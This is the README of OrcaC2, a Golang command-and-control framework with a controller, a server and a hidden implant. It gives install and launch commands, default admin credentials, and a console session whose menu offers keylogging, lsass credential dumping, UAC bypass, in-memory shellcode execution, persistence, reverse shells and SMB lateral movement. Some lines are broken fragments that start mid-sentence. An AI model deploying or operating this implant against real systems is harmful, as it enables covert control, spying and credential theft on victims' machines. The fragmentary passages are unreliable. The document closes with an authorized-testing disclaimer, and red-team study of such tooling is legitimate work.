OrcaC2 is a multifunctional C&C framework based on encrypted WebSocket communication, implemented in Golang.
It consists of three parts: Orca_Server (the server), Orca_Master (the controller), and Orca_Puppet (the controlled end).
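ps command, the displayed process name is that of an arbitrary process in the process list, and it can delete its own program) (when the controlled end is a Linux system)
Before compiling the source code, the following must be installed locally: go (>=1.18), gcc
After downloading and extracting the source package, simply run the install.bat file.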
$ git clone https://github.com/Ptkatz/OrcaC2.git
$ cd OrcaC2
$ chmod +x install.sh
$ ./install.sh
If install.sh fails, run the commands in the script one at a time.
With the configuration file (./conf/app.ini) and the database files (./db/team.db, ./qqwry.dat) present, double-click to run.
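Parameter description:
Orca_Puppet.exe -host <Server IP:port> -debug -hide
Parameter description:
The Puppet can be generated on the Master with the generate/build command.
Orca_Master.exe -u <username> -p <password> -H <Server IP:port>
Parameter description:
The default username and password in the Server database are admin:123456
Successful connection: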
C:\Users\blood\Desktop\OrcaC2\out\master>Orca_Master_win_x64.exe -u admin -p 123456
OrcaC2 Master 0.10.9
https://github.com/Ptkatz/OrcaC2
,;;;;;;,
{;g##7 9####h;;;;,,
{E777777779###########F7'
~` 7##########;
<:_ "##########h
-(:__ VG#3######,
~-=:=:=:__ -""d#####]
~--====_ {Q####]
{;;, ~-<=: l#####
9###. ~==: {Q###F'
g###h, =::` {a####7
;;;########gss;g####P7
7777777777G###7777'
;g77h; lE779; {;P79] g#,
l# #] lE;;gF #] gLJ#,
7N;;F7 l# "9h "7L;g] gF777#,
by: Ptkatz
2022/11/04 19:29:53 [*] login success
Orca[admin] » help
OrcaC2 command line tool
Commands:
clear clear the screen
exit exit the shell
generate, build generate puppet
help use 'help [command]' for command help
list, ls list hosts
port use port scan or port brute
powershell manage powershell script
proxy activate the proxy function
select select the host id waiting to be operated
ssh connects to target host over the SSH protocol
Orca[admin] » list
+----+---------------+-----------------+------------------------------------------+-------+-----------+-------+
| ID | HOSTNAME | IP | OS | ARCH | PRIVILEGE | PORT |
+----+---------------+-----------------+------------------------------------------+-------+-----------+-------+
| 1 | PTKATZ/ptkatz | 10.10.10.10 | Microsoft Windows Server 2016 Datacenter | amd64 | user | 49704 |
| 2 | kali/root | 192.168.123.243 | Kali GNU/Linux Rolling | amd64 | root | 35872 |
+----+---------------+-----------------+------------------------------------------+-------+-----------+-------+
Orca[admin] » select 1
Orca[admin] → 10.10.10.10 » help
OrcaC2 command line tool
OrcaC2 command line tool
Commands:
assembly manage the CLR and execute .NET assemblies
back back to the main menu
clear clear the screen
close close the selected remote client
dump extract the lsass.dmp
exec execute shellcode or pe in memory
exit exit the shell
file execute file upload or download
generate, build generate puppet
getadmin bypass uac to get system administrator privileges
help use 'help [command]' for command help
info get basic information of remote host
keylogger get information entered by the remote host through the keyboard
list, ls list hosts
persist permission maintenance
plugin load plugin (mimikatz|fscan)
port use port scan or port brute
powershell manage powershell script
process, ps manage remote host processes
proxy activate the proxy function
reverse reverse shell
screen screenshot and screensteam
select select the host id waiting to be operated
shell, sh send command to remote host
smb lateral movement through the ipc$ pipe
ssh connects to target host over the SSH protocol
Orca[admin] → 10.10.10.10 »
https://github.com/woodylan/go-websocket
https://github.com/BishopFox/sliver
https://github.com/Ne0nd0g/merlin
https://github.com/Ne0nd0g/go-clr
https://github.com/Binject/go-donut
https://github.com/sh4hin/GoPurple
https://github.com/whitehatnote/BlueShell
https://github.com/0x9ef/golang-uacbypasser
https://github.com/Amzza0x00/go-impacket
https://github.com/C-Sto/goWMIExec
https://github.com/4dogs-cn/TXPortMap
https://github.com/niudaii/crack
https://github.com/anthemtotheego/C_Shot
https://github.com/ramoncjs3/DumpLsass
https://github.com/EgeBalci/EGESPLOIT
Sincere thanks to the authors and teams of the projects above for their contributions to and support of open source.
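assembly invoke function to call some C# programs, errors occur; always test first before using it in your work
smb exec) when coming online, the screenshot and screen control functions cannot be used
-hide), calling the pty function may crash the program!
pty function may crash the program!
This tool is intended only for legally authorized enterprise security work. If you need to test the tool's usability, set up your own target environment.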
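When using this tool for testing, you must ensure that the activity complies with local laws and regulations and that you have obtained sufficient authorization. Do not scan unauthorized targets.
If you engage in any illegal activity while using this tool, you bear the consequences yourself; the author assumes no legal or joint liability.
Before installing and using this tool, please read carefully and fully understand each clause. Limitations, disclaimers, and other clauses affecting your significant rights and interests may be highlighted in bold or underlined to draw your attention. Unless you have fully read, completely understood, and accepted all terms of this agreement, do not install or use this tool. Your use of the tool, or your acceptance of this agreement in any other express or implied manner, is deemed to mean that you have read and agreed to be bound by this agreement.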